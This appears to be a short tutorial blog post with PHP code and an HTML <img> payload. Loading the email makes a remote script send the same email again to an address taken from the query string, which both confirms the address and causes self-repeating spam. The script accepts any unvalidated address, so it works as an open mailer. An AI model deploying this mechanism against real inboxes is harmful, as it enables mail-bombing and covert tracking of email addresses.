This little project I wrote as a proof of concept that it’s possible to send an e-mail or confirm an email address just by loading the email. And because in my case it automatically sends a mail back to me, I called it the “Auto mailer” (or “Spam yourself”)
This program is for educational purpose only! It should not be used in any harmful/illegal or dangerous way!
The concept is based on the facts that (a) you can use HTML in mails and (b) that an <img> tag is just a link to a picture. So I abused this function. I inserted a link to a php-Script that takes the address as an GET-argument and sends the same mail as before to the victim. After testing it out, my whole Gmail account was spammed (c;
<?php $to_email = $_GET["email"]; $email_text = file_get_contents("emailTemplate.html"); $from = "email@example.com"; $subject = "Hello there!";
Here we declare some basic constants.
In line 2 we get the specified address and fix it to the variable $to_email. In line 3 we get the mail template from an external file. You can find the one that I used here. In line 4 we have the address that is being displayed where the mail came from.
$header = "MIME-Version: 1.0\r\n"; $header .= "Content-type: text/html; charset=utf-8\r\n"; $header .= "From: Your Name <$from>\r\n"; $header .= "Reply-To: firstname.lastname@example.org\r\n"; $header .= "X-Mailer: PHP ". phpversion();
In those lines we declare the mail headers. Those are required to tell the mail program how it should interpret the contents of the email (line 7) and where it should send a reply to (line 9)
$email_text = str_replace("§§EMAIL_PLACEHOLDER§§", $to_email, $email_text); mail($to_email, $subject, $email_text, $header);
In line 11 we replace a special code (§§EMAIL_PLACEHOLDER§§ ) with the email address that was specified earlier. This tag is used in the template like this:
<tr><td class="content-block"> <img src="example.com/mailer.php?email=§§EMAIL_PLACEHOLDER§§"> </td></tr>
The mail() function in line 12 sends the email with the specified parameters.
Here you can find the complete source code: